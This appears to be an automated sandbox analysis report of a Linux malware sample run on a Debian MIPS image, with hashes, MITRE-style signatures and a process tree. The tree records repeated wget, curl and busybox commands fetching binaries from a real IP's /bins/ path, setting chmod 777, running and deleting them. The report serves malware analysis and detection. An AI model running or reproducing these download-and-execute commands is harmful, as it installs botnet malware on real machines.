Analysis
-
max time kernel
79s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:716
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:741
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:744
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:745
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:747
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:750
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:751
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:770
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:788
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:790
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:804
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:807
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:808
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:810
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:837
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:850
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:852
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:858
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:867
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:870
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:871
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:873
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:876
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:877
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:879
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:885
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:891
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:897
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:903
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:909
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:912
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:913
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:915
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:918
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:919
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:921
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:924
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:925
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:927
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:930
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:931
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:933
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:936
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:939
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:942
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:943
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:945
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:948
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:949
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:951
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:954
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:955
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:957
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:960
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:961
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:963
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:966
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:967
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:969
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:972
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:973
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:975
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:978
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:979
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:981
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97